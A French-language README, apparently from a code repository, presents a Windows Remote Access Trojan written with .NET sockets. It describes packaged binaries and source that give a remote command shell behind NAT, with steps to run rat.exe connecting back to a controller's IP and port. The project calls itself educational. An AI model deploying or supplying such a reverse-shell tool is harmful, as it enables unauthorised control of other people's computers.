
Windows Remote Access Trojan (RAT)
Cheval de Troie d'accès à distance (RAT) Windows utilisant des sockets .NET
Binaires client-serveur et code source pour contrôler une machine distante derrière un NAT avec un shell en ligne de commande sous Windows. Bien que le noyau prenne en charge la communication avec plusieurs RAT, l'interface en ligne de commande utilisée dispose de capacités limitées pour les distinguer.
L'exécutable du processus RAT ne se cache pas de la barre des tâches ni du gestionnaire de tâches, car il a été développé à des fins éducatives uniquement. Veuillez ne pas l'utiliser à des fins malveillantes.
Contient le code source et les deux binaires empaquetés avec ILMerge.
Instructions :
Démarrez le serveur dans une ligne de commande agissant comme le RAT (Binaries\rat.exe) -> rat ip=[adresse-ip-du-contrôleur] port=[port-du-contrôleur-par-défaut-9999]
Démarrez le client dans une ligne de commande agissant comme le contrôleur (Binaries\controller.exe) -> controller ip=[adresse-ip-d'écoute] port=[port-d'écoute-par-défaut-9999]
Émettez des commandes depuis l'interface de controller.exe